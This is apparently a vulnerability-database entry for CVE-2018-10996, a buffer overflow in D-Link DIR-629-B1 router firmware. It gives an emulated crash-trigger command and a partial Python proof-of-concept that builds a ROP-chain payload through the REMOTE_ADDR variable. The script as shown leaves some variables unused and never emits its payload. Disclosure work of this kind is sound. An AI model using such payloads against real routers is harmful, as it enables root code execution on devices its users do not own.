Authors: kgsdy | Risk: High | CVE: CVE-2018-10996 | 0day: Code execution | 0day-id: 0DAY-176173 | Date: 2018-05-13
The weblogin_log function in /htdocs/cgibin on D-Link DIR-629-B1 devices allows attackers to execute arbitrary code or cause a denial of service (buffer overflow) via a session.cgi?ACTION=logout request involving a long REMOTE_ADDR environment variable.
The vulnerability is in the "/htdocs/cgibin" binary, specifically a buffer overflow in the "weblogin_log" function.
A client can supply an overly long value in the REMOTE_ADDR environment variable, which the "session.cgi?ACTION=logout" handler in "/htdocs/cgibin" passes to weblogin_log, and cause memory corruption. Furthermore, it is possible to redirect the control flow of the program and execute arbitrary code, or write to an arbitrary address.
Program segmentation fault:
chroot . ./qemu -0 "session.cgi" -E REQUEST_METHOD="POST" -E SERVER_PORT="80" -E REQUEST_URI="session.cgi?ACTION=logout" -E HTTP_REFERER="ACTION=123" -E CONTENT_LENGTH=$LEN -E CONTENT_TYPE="application/x-www-form-urlencoded" -E HTTP_COOKIE="uid=aaaaa" -E REMOTE_ADDR="::ffff:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab" ./htdocs/cgibin
We have full control over the return address along with a few other registers. A full ROP chain used to execute 'system("ls");' as the root user can be crafted as follows (ASLR has been disabled for testing purposes):
#!/usr/bin/env python
# Python 2 script: str and struct-packed bytes concatenate directly here.
import sys
import struct

libc = 0x76736000
ra = struct.pack(">I", 0x7677745C)          # gadget 1 (overwrites the saved return address)
gadget2 = struct.pack(">I", 0x76777450)     # gadget 2
bufaddr = struct.pack(">I", 0x76FFF7A0)     # address of the controlled buffer
systemaddr = struct.pack(">I", 0x767872D0)  # system
REMOTE_ADDR = "::ffff:" + "A"*49 + ra + "B"*4 + bufaddr + "C"*30 + gadget2 + "ls"